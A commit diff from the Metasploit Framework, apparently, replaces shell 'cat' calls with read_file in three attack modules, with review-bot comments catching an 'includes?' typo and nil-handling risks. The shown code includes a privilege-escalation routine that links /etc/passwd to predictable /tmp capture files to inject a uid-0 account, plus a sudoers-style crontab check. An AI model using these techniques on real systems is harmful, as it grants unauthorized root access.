Land #7377, read_file for some modules

William Vu
2016-09-28 18:00:23 -05:00
3 changed files with 5 additions and 5 deletions
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
def shemsham_installed?()
# we want this to be false.
vprint_status('Checking if shem or sham are installed')
shemsham = cmd_exec('cat /proc/cpuinfo')
shemsham = read_file('/proc/cpuinfo')
if shemsham.include?('shem')
print_error('shem installed, system not vulnerable.')
elsif shemsham.include?('sham')
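Review bot: `shemsham.include?('shem')` is now called directly on the return value of `read_file`, with no guard for a failed read. The helper is not visible on this page, but if it can return nil when the file cannot be opened, this check would raise NoMethodError instead of reporting a result. `shemsham = read_file('/proc/cpuinfo').to_s` would keep the old always-a-string behaviour. The same applies to `crontab.include?` in the second file and to the `read_file("/etc/passwd")` calls in the third. The body of `shemsham_installed?` continues outside the hunk.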
+1 -1
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status("Now to check whether the script worked...")
# Check whether it worked
crontab = cmd_exec("cat /etc/crontab")
crontab = read_file("/etc/crontab")
vprint_status("Reading crontab yielded the following response: #{crontab}")
unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
vprint_error("Bad news... it did not write to the file.")
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Post
def run
print_status "Setting up the victim's /tmp dir"
initial_size = cmd_exec("cat /etc/passwd | wc -l")
initial_size = read_file("/etc/passwd").lines.count
print_status "/etc/passwd is currently #{initial_size} lines long"
i = 0
j = 0
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Post
print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
end
current_size = cmd_exec("cat /etc/passwd | wc -l")
current_size = read_file("/etc/passwd").lines.count
if current_size == initial_size
# PCAP is flowing
pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Post
i = (i+1) % 60 # increment second counter
end
if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
if read_file("/etc/passwd").includes?("Metasploit")
print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
# TODO: Consider recording our now-created username and password as a valid credential here.
else
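Review bot: In the last hunk of this file, `read_file("/etc/passwd").includes?("Metasploit")` calls a method that Ruby's String does not define. The predicate is `include?`, so this line would raise NoMethodError when reached instead of evaluating the check. It should read `if read_file("/etc/passwd").include?("Metasploit")`. The `if`/`else` opened here, and the enclosing `run` method, continue outside the hunk.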